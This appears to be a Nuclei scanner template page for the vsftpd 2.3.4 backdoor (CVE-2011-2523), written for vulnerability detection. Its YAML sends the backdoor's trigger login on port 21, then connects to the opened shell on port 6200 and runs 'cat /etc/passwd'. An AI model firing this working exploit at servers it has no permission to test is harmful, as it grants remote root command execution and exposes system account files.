VSFTPD 2.3.4 - Backdoor Command Execution
ID: CVE-2011-2523
Severity: critical
Author: pussycat0x
Tags: packetstorm,cve2011,network,cve,vsftpd,ftp,backdoor,vsftpd_project,tcp
Description
Section titled “Description”VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.
YAML Source
Section titled “YAML Source”id: CVE-2011-2523
info: name: VSFTPD 2.3.4 - Backdoor Command Execution author: pussycat0x severity: critical description: | VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted. impact: | Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the FTP server. remediation: | Update to the latest version of VSFTPD, which does not contain the backdoor. reference: - https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/ - https://www.exploit-db.com/exploits/49757 - http://packetstormsecurity.com/files/162145/vsftpd-2.3.4-Backdoor-Command-Execution.html - https://access.redhat.com/security/cve/cve-2011-2523 - https://security-tracker.debian.org/tracker/CVE-2011-2523 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2011-2523 cwe-id: CWE-78 epss-score: 0.85861 epss-percentile: 0.98557 cpe: cpe:2.3:a:vsftpd_project:vsftpd:2.3.4:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: vsftpd_project product: vsftpd shodan-query: product:"vsftpd" tags: packetstorm,cve2011,network,cve,vsftpd,ftp,backdoor,vsftpd_project,tcpvariables: cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDstcp: - host: - "{{Hostname}}" port: 21 inputs: - data: "USER letmein:)\r\nPASS please\r\n" read: 100
- host: - "{{Host}}:6200" inputs: - data: "{{cmd}}\n" read: 100 matchers: - type: regex part: raw regex: - "root:.*:0:0:"# digest: 4b0a00483046022100b504bd4b64591542e30a46de3001848e9fe050fe03bff61bdf2b3620560bf486022100cc5bd4876cf0840f4db069fb6f80a5c05d6bbb42b06cd42e085c1af70a870768:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "network/cves/2011/CVE-2011-2523.yaml"